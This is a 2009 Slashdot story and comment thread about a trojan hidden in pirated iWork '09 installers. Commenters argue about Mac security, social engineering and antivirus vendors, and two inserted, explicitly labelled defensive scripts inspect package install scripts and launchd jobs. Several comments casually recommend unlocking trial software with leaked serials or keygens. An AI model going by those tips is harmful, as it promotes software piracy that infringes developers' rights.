
Slashdot: News for Nerds


Trojan Hides In Pirated Copies of Apple iWork '09

timothy posted more than 5 years ago | from the good-reason-not-to-pirate-software dept.

Security 431

CWmike writes "Pirated copies of Apple's new iWork '09 suite that are now available on file-sharing sites contain a Trojan horse that hijacks Macs and leaves them open to further attack, a security company said yesterday. The 'iServices.a' Trojan hitchhikes on iWork '09's installer, said Intego, which makes Mac security software. 'The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password,' Intego said in a warning. Once installed, the Trojan "phones home" to a malicious server to notify the hacker that the Mac has been compromised, and to await instructions."


431 comments

Now unveiling... (5, Funny)

Majik Sheff (930627) | more than 5 years ago | (#26570071)

The iPwn!

Re:Now unveiling... (1, Troll)

Lucky75 (1265142) | more than 5 years ago | (#26570723)

Does anyone else find it funny that after Apple ran all of those "Mac vs Windows" commercials about how Macs are virus free, this happens? It was obvious to anyone with half a brain that the only reason macs don't have viruses is because no one bothers to write one for them. Aaah, Karma, gotta love it :)

Re:Now unveiling... (5, Insightful)

Anonymous Coward | more than 5 years ago | (#26570789)

Go learn about the difference between a virus and a trojan.

Re:Now unveiling... (5, Funny)

guitarpy (1154687) | more than 5 years ago | (#26570797)

I'd like to take this opportunity to welcome mac users to the pc world...I mean really....pirated software with a virus...who would have seen that one coming?

Not that I condone piracy but (3, Funny)

Anonymous Coward | more than 5 years ago | (#26570079)

Why not download the Trial version and unlock it with one of the million serials out there?

Re:Not that I condone piracy but (5, Funny)

FearForWings (1189605) | more than 5 years ago | (#26570577)

Then you don't get the trojan from iWorks, but from the keygen that further frustrates you by playing an annoying and loud tune while you go through the serial generating process.

Note to keygen creators: I do not want to hear your brother's crappy techno remixes when using your app. Is there some way I can pay you to disable this feature?

Re:Not that I condone piracy but (4, Informative)

Firehed (942385) | more than 5 years ago | (#26570645)

Not that I'd ever use a keygen or anything, but that's definitely only a Windows problem. From what I *cough* hear, most apps are either pre-cracked, have a drag-and-drop crack (how Mac-like), or just need any of a hundred serials floating around with no further mess.

(Actually, I think all of my software is totally legit except for Photoshop, and I plan to buy it eventually)

Re:Not that I condone piracy but (5, Insightful)

Em Ellel (523581) | more than 5 years ago | (#26570721)

Note to keygen creators: I do not want to hear your brother's crappy techno remixes when using your app. Is there some way I can pay you to disable this feature?

Erm, you can indeed. You can pay money to buy a legit serial number - voila - no crappy techno music.

-Em

Re:Not that I condone piracy but (0)

Anonymous Coward | more than 5 years ago | (#26570863)

But that would go against the people's right to enjoy the work of others for free. Haven't you heard the news? King Richard Stallman the Unbathed has decreed that not giving your work away for free is a mortal sin. Woe betide the programmer who wants to get paid. Unless he gets paid by a company for customization? I guess. It's nebulous and makes about as much sense as hippy crap normally does.

Re:Not that I condone piracy but (4, Informative)

djupedal (584558) | more than 5 years ago | (#26570751)

Apple removed serial number requirements from iWork '09 - just install from the CD and go.

Now, explain again how to use a sn with a crippled trial, please...

Of course (5, Insightful)

ColdWetDog (752185) | more than 5 years ago | (#26570085)

About Intego

Intego develops and sells desktop Internet security and privacy software for Macintosh.

Re:Of course (4, Interesting)

0100010001010011 (652467) | more than 5 years ago | (#26570225)

LittleSnitch [obdev.at] is one of my favorite security programs. Shows any outgoing connections and I can allow for that session, once, or forever and to just that port, any port, that host, that host and port.

Does anyone have a torrent to a file with the trojan? I'd like to open the .pkg and look at it. It's surprisingly easy to look at the 'install' files. Right click on the pkg and open a few folders and look for pre-flight & post-flight scripts (which can be written in about any language). .pkgs are fun little things.
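The inspection described in the comment above, as an added example that is not part of the original post: a shell function that lists the install-time scripts inside a bundle-style .pkg or .mpkg (a directory on disk) so they can be read before the installer is run. The function names are made up for this example, the script names checked are the conventional ones for bundle-style packages, and `make_sample_pkg` builds a constructed, harmless sample layout.

```shell
#!/bin/sh
# Added example (not from the thread): read a package's install scripts
# before running its installer. Assumes a bundle-style .pkg/.mpkg, i.e. a
# directory; a flat package must be expanded first (pkgutil --expand on macOS).

# Conventional script names in bundle-style packages.
PKG_SCRIPT_NAMES="preflight postflight preinstall postinstall preupgrade postupgrade InstallationCheck VolumeCheck"

# list_pkg_scripts <package-dir>
# Prints "<relative path><TAB><line count><TAB><first line>" per script.
# Returns 0 if scripts were found, 1 if none, 2 if the path is not a directory.
list_pkg_scripts() {
    pkg=${1%/}
    if [ ! -d "$pkg" ]; then
        echo "not a bundle-style package: $1" >&2
        return 2
    fi
    report=$(
        # Recursing also covers packages nested inside an .mpkg.
        find "$pkg" -type f | sort | while IFS= read -r f; do
            case " $PKG_SCRIPT_NAMES " in
                *" $(basename "$f") "*) ;;   # known script name: report it
                *) continue ;;
            esac
            lines=$(( $(wc -l < "$f") ))
            # The first line normally names the interpreter (sh, perl, python, ...).
            first=$(head -n 1 "$f" | tr -d '\r' | cut -c1-80)
            printf '%s\t%s\t%s\n' "${f#"$pkg"/}" "$lines" "$first"
        done
    )
    [ -n "$report" ] || return 1
    printf '%s\n' "$report"
}

# make_sample_pkg <dir>: builds a constructed, harmless sample package layout.
make_sample_pkg() {
    inner="$1/Sample.mpkg/Contents/Packages/Inner.pkg/Contents/Resources"
    mkdir -p "$inner" "$1/Sample.mpkg/Contents/Resources"
    printf '#!/bin/sh\necho "constructed postflight"\n' > "$inner/postflight"
    printf '#!/usr/bin/perl\nprint "constructed preflight\\n";\n' > "$1/Sample.mpkg/Contents/Resources/preflight"
    printf 'Not a script.\n' > "$1/Sample.mpkg/Contents/Resources/ReadMe.txt"
}
```

Each reported path can then be opened in a text editor or pager; nothing in the package is executed by the listing.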

Re:Of course (3, Insightful)

calmofthestorm (1344385) | more than 5 years ago | (#26570311)

It's especially nice if such monitoring software is not "on the radar" of malware sites, since they could include a workaround for such software, as is frequently done for Norton and Symantec on Windows.

Re:Of course (1, Funny)

Anthony_Cargile (1336739) | more than 5 years ago | (#26570517)

Right click on the pkg...

(stares at the Macbook touchpad)

*sob*

Re:Of course (4, Insightful)

ColdWetDog (752185) | more than 5 years ago | (#26570569)

(stares at the Macbook touchpad)

You got two fingers [macosxhints.com] ? (If not, sorry, I'm an insensitive clod.)

Re:Of course (-1, Troll)

Anonymous Coward | more than 5 years ago | (#26570573)

You fucking idiot, figure it out, it's not that hard.

Re:Of course (1)

Anthony_Cargile (1336739) | more than 5 years ago | (#26570633)

Can't take a joke, eh? And if it's any consolation, instead of control-clicking .apps and similar deals like .pkgs, I just manipulate them in terminal.app. And my Gateway laptop, which has OS X Leopard installed, does in fact have 2 mouse buttons.

Re:Of course (0)

Anonymous Coward | more than 5 years ago | (#26570767)

I laughed.

Re:Of course (0)

Anonymous Coward | more than 5 years ago | (#26570795)

Intego have cried "WOLF!" too many times for me to take them seriously. They claimed to have a fix for a concept virus that was still in the lab.
Their hardware sucks, too, as does their after-sales service.

Why pirate iWork (0)

Anonymous Coward | more than 5 years ago | (#26570087)

It's easier to just download the trial version and look for the serial number. This is yet another thing which Apple makes easier and more secure :)

Re:Why pirate iWork (0, Troll)

Anonymous Coward | more than 5 years ago | (#26570155)

and it's even easier to just download openoffice.

Re:Why pirate iWork (1)

spud603 (832173) | more than 5 years ago | (#26570451)

It's easier to just download the trial version and look for the serial number.

Though you're likely to get faster download times through bittorrent with a popular package like this.

Re:Why pirate iWork (2, Informative)

Firehed (942385) | more than 5 years ago | (#26570677)

Have you downloaded something using Apple's servers? I get a solid 1MB/s+ almost all the time, pretty much maxing out my entire connection. It's very rare for me to get anywhere near that on ANY torrent, even very popular ones - plus Apple doesn't ask me to upload the same amount for proper etiquette.

cynicism (5, Insightful)

bwthomas (796211) | more than 5 years ago | (#26570107)

Sometimes I wonder if companies that create security software aren't sometimes guilty of either creating or funding the creation of viruses, trojans, worms, &c. simply to justify their own existence.

Is that cynical?

Re:cynicism (5, Insightful)

zappepcs (820751) | more than 5 years ago | (#26570307)

They certainly use virus news to justify their existence and the cost of their products. The fact that they exist is tantamount to admitting that no OS can be fully secured.

The harder anti-virus vendors bleat on about how good their product is, the more bragging rights a virus writer will get for walking around the security... among their own crowd. It's more or less a case of putting up a wall and telling the world, there, you can't get past this wall now.

The real trouble with anti-virus vendors is that they tend to convince people that once their product is installed, the end user's pc is safe. It is NOT, and won't ever be. Some of the best virus programs in the world are still out in the wild, running as they were intended to run, collecting and passing information as they are supposed to. Since they are not destructive to normal computer activity, they go undetected. Don't say that such does not exist... I know you have not done forensics on all existent computers. Every now and then we hear about some corporate espionage or attacks from state military groups etc. All of this is just hinting at the real problems: The virus programs we don't know about.

Think about it. If a virus program did some key logging for bank URLs then spread itself a bit, then self destructed... hmmmmm They are seeing more sophisticated virus programs now, and fortunately beginning to look for them. Sadly, you'll have some pretty incredibly long scan times to find some types of malicious software: none of this 45 minute scan by Symantec etc.

Soon, you'll need a multicore CPU just to handle real time scanning. It's a giant whack-a-mole game. Always will be.

Re:cynicism (0)

Anonymous Coward | more than 5 years ago | (#26570367)

They certainly use virus news to justify their existence and the cost of their products. The fact that they exist is tantamount to admitting that no OS can be fully secured.

Psst. No OS can be fully secured.

Re:cynicism (2, Funny)

masshuu (1260516) | more than 5 years ago | (#26570715)

Psst. Hack my ubuntu. now

Re:cynicism (1)

calmofthestorm (1344385) | more than 5 years ago | (#26570317)

As long as there are crackers without girlfriends in the world, they don't need to.

But to fuel your paranoia, maybe *that*'s why they sometimes used to offer jobs to prominent crackers;)

New anti-virus company (5, Funny)

Narnie (1349029) | more than 5 years ago | (#26570525)

As long as there are crackers without girlfriends in the world, they don't need to.

I propose starting a new anti-virus company that will focus on dates for crackers rather than OS security.

Re:cynicism (3, Funny)

warrigal (780670) | more than 5 years ago | (#26570811)

Hey! Just who are you calling cracker, boy?

Re:cynicism (1)

philspear (1142299) | more than 5 years ago | (#26570385)

No, I've thought that for a long time. But I showed them, I simply downloaded a cracked version of their antivirus software! Sure, my computer promptly stopped working, but I'm sure that would have happened anyway. Correlation is not causation.

Re:cynicism (0)

Anonymous Coward | more than 5 years ago | (#26570523)

You know, this is a tricky question. I used to think like you, but now I am in the industry and I really don't think that is the case. Nobody really wants to make security software. In a perfect world, everything would just work and we could spend our time working on things that people actually want. However, it's an imperfect world and people are assholes, so security software is (unfortunately) necessary. It does pay pretty good and it is certainly interesting work, but I can honestly say I would feel better working on a proactively useful project (word processor, photo editor, etc.) instead of trying to protect systems from assholes.

Re:cynicism (1)

Klootzak (824076) | more than 5 years ago | (#26570641)

Is that cynical?

Actually, it's called Critical or Analytical thinking [wikipedia.org] ...

Cynicism is a negative perception of something that doesn't necessarily involve evaluation of the topic in the larger context, something like:
"There is no good left in the world, people will never change, and I might as well become evil too!".
^^^^That's some pretty bad cynicism (or pessimism) though, hopefully most people don't ever get that cynical ;).

But, but.... (-1, Troll)

cbiltcliffe (186293) | more than 5 years ago | (#26570113)

But...but...butbutbut, Macs can't get viruses and Trojans, because they're so secure!!!

</sarcasm>

Re: But, but.... (4, Insightful)

JPortal (857107) | more than 5 years ago | (#26570147)

This requires user action and piracy. No one can -ever- claim that -any- computer is safe from, essentially, social engineering.

Re: But, but.... (5, Insightful)

vux984 (928602) | more than 5 years ago | (#26570283)

This requires user action and piracy.

So does 99.99% of windows malware.

No one can -ever- claim that -any- computer is safe from, essentially, social engineering.

Again right. But what's the solution? That is the real question.

Because this is the ecosystem microsoft lives in, we've seen what they're trying... digital signatures on drivers, the inability to put admin items in your startup, UAC prompts... etc, etc.

What is Apple going to do in response to inevitable arrival of social-engineering malware as it gains marketshare?
What is Linux going to do if/when it achieves enough marketshare among joe-sixpacks for social engineering to be profitable?

As much as /. likes to take shots at Microsoft, what would you do better? *nix security is just as vulnerable to social engineering as windows is, given the same users.

Re: But, but.... (5, Interesting)

calmofthestorm (1344385) | more than 5 years ago | (#26570349)

Um most pirated software is clean of malware. The primary vectors are email and infected websites (often reputable ones that are compromised themselves, often due to sketchy)

The "piracy has VIRUSES!" myth is very much a content industry creation. I'm more concerned about malware in "genuine" software than pirated, and one more reason that I pirate things when I do. Of course, you -are- running an executable from a total stranger. At least "genuine" software makers have it tied to their name, so this could easily become truer.

Given that all three OSes have sudo, social engineering will ALWAYS work. Unless we take sudo away from average users (which is far easier to get away with on linux than windows and still have everything work smoothly)

If you're really paranoid, you might consider running your browser and mail client in a virtual machine

Re: But, but.... (1)

JPortal (857107) | more than 5 years ago | (#26570409)

I've never claimed on /. that Apple has better security. In private, to family, years ago - and I've since repented. I'm just saying, it's silly to criticize Apple for this.
It's also silly to criticize Microsoft if there are torrents of virus-laden MS Office floating around.

Re: But, but.... (1)

hellwig (1325869) | more than 5 years ago | (#26570535)

Apple does deserve criticism because they encourage their users to NOT install Anti-Virus software. Anyone remember the numerous, unnecessary stories a few weeks ago about how some old, out of date page on Apple's website was recommending Antivirus software, and then Apple took it down?

Now, maybe antivirus software wouldn't have caught this particular virus, but to tell people not to protect themselves is just stupid. People will ALWAYS download virii, they're just that stupid. Apple should encourage their users to protect themselves, not tell their users that the OS is so secure it doesn't need Antivirus. Apple touts itself as being easy to learn and use, why would they think that gives them a user-base smart enough to not download pirated software that could possibly contain a virus?

Re: But, but.... (1)

JPortal (857107) | more than 5 years ago | (#26570659)

No, I definitely agree. I agree with Leo Laporte's take on that, I think AAPL devs and tech support would be fine with antivirus - but not the marketing team.

Re: But, but.... (3, Insightful)

Doctor_Jest (688315) | more than 5 years ago | (#26570683)

They don't encourage users NOT to install... they simply don't hawk the virus software as a crutch to avoid good common sense. That's not to say that Windows (or more specifically Microsoft) does, it's just the nature of the OS itself that dictates what might be vs. what might not be.

You can safely say that, out of the box, Apple's OS is safer than Microsoft's (and you can make up your own reasons why), and this particular "virus" (it's a trojan, not a virus) isn't related to a vulnerability in the OS. It's related to a vulnerability in a trusting user. It's vastly different than an exploit that antivirus programs are designed to watch for. No antivirus would protect someone from this, unless it was known already as a trojan (then an update would have to show up, etc.) But you begin to see the fallacy of blaming Apple for social engineering. Educating the novices of ANY OS is something we should be doing, rather than trying to have a pissing contest between Jobs and Ballmer.

Re: But, but.... (2, Informative)

Daengbo (523424) | more than 5 years ago | (#26570423)

The biggest w32 virus right now only requires the user to click on what appears to be the normal choice for safe viewing of USB key contents, but other USB trojans don't even need that much. Most of the other forms of malware are installed via drive-by download or by worm propagation. I doubt 99.99% of malware needs user action, or worms, USB Trojans, and drive bys wouldn't be so dangerously prevalent.

I guess you could call "visiting a website" or "plugging in a USB key" user action, but there's no action needed to be infected by a worm.

Wait. You're right. Users have to turn on their machines.

Re: But, but.... (2, Insightful)

Anthony_Cargile (1336739) | more than 5 years ago | (#26570553)

So does 99.99% of windows malware.

Somehow I doubt that Windows worms and exploits only make up .001% of all Windows malware. The old lsass exploit (yeah, I know you remember) was pretty widespread and only required an internet connection and an unpatched Windows 2000/maybe XP machine. ...But it was only a part of the .001% of non-user interactive malware that your statistics seem to assert.

Re: But, but.... (1)

Anthony_Cargile (1336739) | more than 5 years ago | (#26570655)

only make up .001%

Man, what am I? A buggy old pentium? Should have been .01%, my bad.

Re: But, but.... (1)

slazzy (864185) | more than 5 years ago | (#26570635)

Why download infected version of iWork when Apple gives it away free on their site?

Re: But, but.... (1)

Sleepy (4551) | more than 5 years ago | (#26570657)

>So does 99.99% of windows malware.

If you are going to make up false statistics, at least make them BELIEVABLE.

Besides accusing 99% of the population who are hit by malware of being thieves and you are likely to know what you are saying is untrue. malware-on-USB-drives and picture frames, browser hijacking...

Re: But, but.... (0)

Anonymous Coward | more than 5 years ago | (#26570671)

Slashdot is no place for insightful discussions!

What is Apple going to do in response to inevitable arrival of social-engineering malware as it gains marketshare?

Why, make the OS check the Apple Store every time the user downloads an unknown application, of course!

What is Linux going to do if/when it achieves enough marketshare among joe-sixpacks for social engineering to be profitable?

Blame the users!
Put up a big honking screen saying "do not give your password to other people" at startup, and make some problems fixable without root privileges.

As much as /. likes to take shots at Microsoft, what would you do better?

Nothing. We just want to continue taking potshots, since we're so used to Microsoft-bashing since the early 1990s.

*nix security is just as vulnerable to social engineering as windows is, given the same users.

*nix security may be more vulnerable, since these users will use the root account for everything.

Re: But, but.... (1)

ceoyoyo (59147) | more than 5 years ago | (#26570437)

Macs are much more difficult to infect with a worm or virus, neither of which has to ask the user to do something.

ANY (usable) system is vulnerable to trojans, no matter how well designed.

It's all Apple fault (4, Funny)

pHatidic (163975) | more than 5 years ago | (#26570119)

If only Apple hadn't stripped out the DRM this would have never happened!

No, that's impossible. (2, Funny)

coppro (1143801) | more than 5 years ago | (#26570121)

Haven't you seen the ads? Mac OS X doesn't get viruses. This story is a complete fabrication, bankrolled by Microsoft, created to instil fear in The Perfect Operating System. Please link real stories next time.

Re:No, that's impossible. (4, Insightful)

falcon5768 (629591) | more than 5 years ago | (#26570239)

Who's talking about a virus? I don't see ANYTHING about a virus. I DO see a story about a TROJAN. Whole different ball of wax there. No system EVER will be secure from a trojan, since for a trojan to work the USER has to willingly give his admin password to install it.

Re:No, that's impossible. (3, Interesting)

onecheapgeek (964280) | more than 5 years ago | (#26570275)

And how long has it been since a true virus was attacking windows? It's always trojans, worms or adware and has been for several years.

Re:No, that's impossible. (5, Insightful)

AKAImBatman (238306) | more than 5 years ago | (#26570337)

And how long has it been since a true virus was attacking windows?

Just this week. [nytimes.com]

It's always trojans, worms or adware and has been for several years.

A worm differs from a virus only in so much that it doesn't need to copy itself into a system program. For all intents and purposes however, the difference between the two terms is antiquated.

Re:No, that's impossible. (1)

MacColossus (932054) | more than 5 years ago | (#26570373)

As a virus requires user interaction such as double clicking an email attachment and worms require no user interaction and auto install due to unpatched vulnerabilities in the OS, I would think worms are worse. The last time a major worm hit over 9 million Windows users was Jan 20th 2009. http://www.techtree.com/India/News/Windows_Virus_Infects_9_Million/551-98002-582.html [techtree.com] Back on topic, Macrumors reports that the trojan is already receiving instructions and participating in Denial of Service attacks. They also have manual removal instructions. http://www.macrumors.com/2009/01/22/iwork-09-torrent-carrying-os-x-trojan/ [macrumors.com]

Re:No, that's impossible. (1)

ceoyoyo (59147) | more than 5 years ago | (#26570467)

Yes. Worms. Nobody ever hears about a trojan attacking Windows. It's simply not news.* Worms are the really evil ones, because they spread with no intervention, over the network, meaning they can infect a huge number of machines very quickly.

Re:No, that's impossible. (2, Funny)

troll8901 (1397145) | more than 5 years ago | (#26570729)

And how long has it been since a true virus was attacking windows?

Every single day. Truly. They do that in building construction and renovation all the time.

("You move to an area and you multiply and multiply ... There is another organism on this planet that follows the same pattern. Do you know what it is? A virus.")

It's always trojans, worms or adware and has been for several years.

I don't think big wooden horses can fit through a window, although little crawling worms and poster advertisements can.

Re:No, that's impossible. (1)

99BottlesOfBeerInMyF (813746) | more than 5 years ago | (#26570305)

No system EVER will be secure from a trojan, since for a trojan to work the USER has to willingly give his admin password to install it.

I disagree. Systems can be and have been designed to make getting a trojan running and useful a very, very difficult feat of social engineering or even impossible without hacking the machine in advance. Right now these systems are fairly restricted in their deployment and none are mainstream on consumer PCs, but that doesn't mean mainstream OS's can't catch up and both OS X and Linux are working on technologies that can help mitigate trojans.

Re:No, that's impossible. (1)

Sir_Lewk (967686) | more than 5 years ago | (#26570575)

Bullshit. A proper trojan differs from regular programs only in that it convinces the user it's meant for something else.

Re:No, that's impossible. (0)

Anonymous Coward | more than 5 years ago | (#26570819)

A proper trojan differs from regular programs only in that it convinces the user it's meant for something else.

True.

This is the exact reason why you will never find a trojan in an open source repository. The source code will reveal what it really is meant for. All it takes to be uncovered is one person who can read the source, if it even gets that far.

It really should be noted... (4, Funny)

Anonymous Coward | more than 5 years ago | (#26570129)

That it is the easiest trojan to use ever. Bravo, Apple.

Why is this a story? (2, Insightful)

Dreadneck (982170) | more than 5 years ago | (#26570145)

Since when does a PEBKAC error count as news? If you're idiot enough to install pirated software then you deserve what you get - and absolutely nobody can protect a computer system against user stupidity.

Re:Why is this a story? (1)

99BottlesOfBeerInMyF (813746) | more than 5 years ago | (#26570263)

Since when does a PEBKAC error count as news?

I take exception to your assertion. Just because a user runs a program does not mean that program should automatically be able to connect to a remote server without their permission or notification. That's the case for almost all current, mainstream OS's but that does not mean it is a good design.

Second, this is news because it is a trojan reportedly in the wild for a platform where there are very few trojans circulating, especially trojans that are not targeting a specific person or company. People want to know about it and if it signals the beginning of a trend then Apple may finally have the motivation to push their new security frameworks more aggressively and develop other security elements to help protect users from trojans. It's not like there isn't anything that can be done to make trojans less dangerous.

...and absolutely nobody can protect a computer system against user stupidity.

True, but having some fairly reasonable expectations of your computer and not understanding that it is different from other consumer appliances like the iPhone or a TV is not stupidity. It is ignorance, but forgivable (in my opinion) for non-technical users. A well designed OS in this day of prevalent malware should lock down individual applications and check them against a database of signatures (both known good applications and known malware) and let the user know when a new application connects to outside servers and what those servers are and give them the option of allowing the connection or preventing it.

Re:Why is this a story? (2, Insightful)

Dreadneck (982170) | more than 5 years ago | (#26570335)

From the article:

The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password

As I said, it's a PEBKAC error. If you give an installer your admin password it can do whatever it pleases. Only an idiot installs pirated wares and only a supremely stupid idiot gives said warez the root password. No security paradigm will ever be invented that cannot be undermined by human stupidity.

Re:Why is this a story? (0, Flamebait)

Dreadneck (982170) | more than 5 years ago | (#26570407)

And if a user is stupid enough to install a pirated ware AND give said ware the root password, what on earth makes you think they will possibly be able to understand what to do if informed that process xyz is opening a connection?

Re:Why is this a story? (1)

99BottlesOfBeerInMyF (813746) | more than 5 years ago | (#26570563)

And if a user is stupid enough to install a pirated ware AND give said ware the root password, what on earth makes you think they will possibly be able to understand what to do if informed that process xyz is opening a connection?

Some will and some won't, but if you don't give them the option then you can hardly blame them. Users need better choices and need to enter their password less often for normal application installs first, then we can worry about user education to deal with the remaining applications.

Re:Why is this a story? (2, Insightful)

99BottlesOfBeerInMyF (813746) | more than 5 years ago | (#26570515)

As I said, it's a PEBKAC error. If you give an installer your admin password it can do whatever it pleases.

And if you read my post, I'm telling you that is a design flaw in the OS. On a well designed OS, the software has more granularity of permission than "can do everything including connect to random servers" and "can't install". Apple seems to agree with me since they added an ACL framework to restrict applications with a finer level of permissions in the last version, although it is only used for a small subset of applications so far.

Only an idiot installs pirated wares and only a supremely stupid idiot gives said warez the root password.

I think installing pirated software is unethical and risky, but not necessarily stupid. As for giving it the root password, users have to give up their password all the time to install software, which is part of the problem.

No security paradigm will ever be invented that cannot be undermined by human stupidity.

Maybe, maybe not, but you can sure do a heck of a lot more than current, mainstream OS's do now to help users avoid such security threats.

Re:Why is this a story? (1)

Trogre (513942) | more than 5 years ago | (#26570379)

iPhone... consumer appliance.

I'd say it's closer to a computer than you might think, and I don't see anything realistic preventing malware entering that platform too.

Re:Why is this a story? (1)

99BottlesOfBeerInMyF (813746) | more than 5 years ago | (#26570597)

iPhone... consumer appliance. I'd say it's closer to a computer than you might think, and I don't see anything realistic preventing malware entering that platform too.

Software for the iPhone is centrally distributed by Apple and uses a signing framework to check packages (regular OS X has it too but it is largely unused). So how is someone going to post fake software with a trojan in it? If they manage to slip one past Apple's review, as soon as it is found Apple can revoke the signature for all copies deactivating them. Software on the iPhone runs in a sandbox and generally has limited permissions making it hard to root. All of these can be overcome, but it is really really hard by comparison to OS X on a Mac, where most of these security measures are not utilized. About the only real issue is if someone hacks the iPhone so it can run other software then installs a trojan, but that applies only to a small subset of iPhones.

Re:Why is this a story? (0)

Anonymous Coward | more than 5 years ago | (#26570403)

Why would you download a pirated copy of iwork 09 just download the trial version from apple and use a serial from one of the myriad of sites to make it fully functional.

Actually (1)

commodoresloat (172735) | more than 5 years ago | (#26570777)

I'm a lot more concerned about the legitimate and semi-legitimate companies that install spyware and malware with their software. At least when this kind of crap goes up on a torrent site, there are 7 posts within an hour or two warning other users that there's malware in the program. Whereas when a Microsoft or Sony sets you up the bomb they spend months denying there's a problem first. That still doesn't excuse the lazy user who installs whatever without checking it out first, but I don't think it's accurate to say that "pirated" software is inherently less secure.

I can see the commercial: (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#26570149)

Mac: Hi, I'm a Mac
PC: And I'm a PC.

Mac: I'm sleeker, stronger, and more attractive!
PC: Well, I know many more people than you do.

Mac: Look at my physique, I'm the perfect specimen of health!
PC: You gave me chlamydia last month.

Mac: What?!
PC: I'm lucky my doctor saw it and prescribed antibiotics for it. All clean! Have you been tested lately?

Mac: No, and you said you wouldn't tell anybody!
PC: It was going to happen sooner or later. We had to hook up sometime, right?

Mac: Don't let anybody find out about this! My reputation will be ruined!
PC: Dude, everybody already knew you were a faggot. I just regret letting you in my room that night.

Mac: Now everybody's gonna know! What am I supposed to tell them?!
PC: Uh, you're an arrogant gay?

Re:I can see the commercial: (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#26570537)

omg, seriously the funniest mac ad spoof i've ever SEEN, let alone read. Kudos, arrogant faggot!

If Apple were evil... (2, Insightful)

JoshuaZ (1134087) | more than 5 years ago | (#26570157)

If Apple were evil they could deliberately put hacked versions onto filesharing sites. More seriously, this is a good example of why even pirating software is really not a good idea. Unless you know exactly who you are downloading from you don't know what you are getting. Very little commercial software has nice little checksums or hashes that are easily available for you to verify. Downloading pirated software is a bit like having unprotected sex with a stranger. It might feel real good now, but you are going to regret it later.

Re:If Apple were evil... (0, Offtopic)

pipingguy (566974) | more than 5 years ago | (#26570823)

Why is the latest iTunes update 75MB? My relatively small SSD can't keep up with these bloated patches.

haha (0)

Anonymous Coward | more than 5 years ago | (#26570165)

haha

Not a vulnerability (0, Flamebait)

The Bungi (221687) | more than 5 years ago | (#26570171)

But like many a Windows trojan/malware that relied on user intervention to get its foot in the door, I don't see why this cannot be blamed on Apple's "sloppy code" (to draw a parallel with the same things that get blamed on Microsoft).

A Unix-like system with a root account is not superior to an NT box, even when used by someone who runs under a non-privileged account but cannot be bothered to exercise some damn common sense wrt what they put on their computers.

As their numbers grow, I expect masses of stupid Apple users (probably the same stupid Windows users that migrated to OS X to be "safe") to do things like enter their root password into browser add-ons because they are asked for it, and download "cool" screensavers and pirated software like this, loaded with malware. Membership in botnets cannot be far behind at that point.

And then when Apple machines get hit by exploits to vulnerabilities that have been patched for three months which users can't be bothered to install updates for, all will be good.

And guess what OS will be next up.

Re:Not a vulnerability (1)

speedingant (1121329) | more than 5 years ago | (#26570247)

OS X doesn't come with root enabled by default. Giving your password can give said application su privileges, but won't be able to edit system files owned by root. They have to be well engineered daemons themselves to do something like this. And it all starts with the person using the computer typing in their password to install something dodgy.

Re:Not a vulnerability (2)

onecheapgeek (964280) | more than 5 years ago | (#26570289)

If it can install a launch agent/daemon, it runs as system with full access to anything. And all it takes to install a launch agent/daemon is your admin password.
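A defender's view of the point in the comment above, as an added example that is not part of the thread: launchd job definitions are property lists, so they can be parsed and compared against a known-good baseline. The sample plists, labels, baseline set and trusted-path list below are constructed assumptions for illustration.

```python
import plistlib

# Assumption: prefixes where launchd job binaries are expected to live.
TRUSTED_PREFIXES = ("/System/Library/", "/usr/libexec/", "/usr/sbin/",
                    "/usr/bin/", "/sbin/", "/bin/")

def job_program(job):
    """Return the executable launchd would start for this job, or None."""
    if "Program" in job:
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else None

def audit_job(plist_bytes, baseline_labels):
    """Parse one launchd plist and list the reasons it deserves review."""
    job = plistlib.loads(plist_bytes)
    label = job.get("Label", "<missing>")
    program = job_program(job)
    findings = []
    if label not in baseline_labels:
        findings.append("label not in baseline: " + label)
    if program is None:
        findings.append("no Program or ProgramArguments")
    elif not program.startswith(TRUSTED_PREFIXES):
        findings.append("program outside system paths: " + program)
    # Persistence settings are common in legitimate jobs, so they are
    # reported only as context for a job that is already suspicious.
    if findings and job.get("RunAtLoad") and job.get("KeepAlive"):
        findings.append("starts at load and is restarted if killed")
    return findings

def audit_all(samples, baseline_labels):
    """Map file name -> findings for every job with at least one finding."""
    report = {}
    for name, data in samples.items():
        findings = audit_job(data, baseline_labels)
        if findings:
            report[name] = findings
    return report

def make_plist(label, argv, **extra):
    """Build a constructed sample plist (not taken from a real system)."""
    return plistlib.dumps(dict(Label=label, ProgramArguments=argv, **extra))

# Constructed samples; on a Mac, read /Library/LaunchDaemons/*.plist,
# /Library/LaunchAgents/*.plist and ~/Library/LaunchAgents/*.plist instead.
SAMPLES = {
    "com.apple.example.plist": make_plist(
        "com.apple.example", ["/usr/libexec/exampled"], RunAtLoad=True),
    "com.example.updater.plist": make_plist(
        "com.example.updater", ["/private/tmp/.helper", "--quiet"],
        RunAtLoad=True, KeepAlive=True),
}
BASELINE = {"com.apple.example"}

if __name__ == "__main__":
    for name, findings in audit_all(SAMPLES, BASELINE).items():
        print(name, findings)
```

The baseline is the part that matters in practice: record the labels present on a clean install, then review anything that appears after installing software that asked for an administrator password.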

Re:Not a vulnerability (1)

Doctor_Jest (688315) | more than 5 years ago | (#26570711)

and since no amount of OS security can protect someone from giving their password out, we're not looking at a vulnerability... unless you count the user himself/herself. :)

Re:Not a vulnerability (4, Insightful)

DurendalMac (736637) | more than 5 years ago | (#26570261)

I don't think anyone would blame Microsoft for user-installed malware. It's when you get something simply by going to a website, clicking a link, mounting a drive, or even just hooking it up to the internet that can be blamed on lousy code. When malicious nasties get onto OS X by any of the above with no real action on the user's part, then we can all blame Apple just like we blamed Microsoft. Until then, it's just a PEBKAC issue.

You must be new here. (1)

HornWumpus (783565) | more than 5 years ago | (#26570353)

Micro$oft is the whipping boy.

Granted they make it easy (to install malware and whip them.)

Re:Not a vulnerability (1)

The Bungi (221687) | more than 5 years ago | (#26570463)

I don't think anyone would blame Microsoft for user-installed malware.

People do, in fact. They simply lump those into the "Windows is insecure" mantra. Statistically the number of actual vulnerabilities that have not been patched and have an exploit in the wild (which would be a good example of security breakdown) are rare.

Re:Not a vulnerability (0)

Anonymous Coward | more than 5 years ago | (#26570749)

I don't think anyone would blame Microsoft for user-installed malware.

You must be new here.

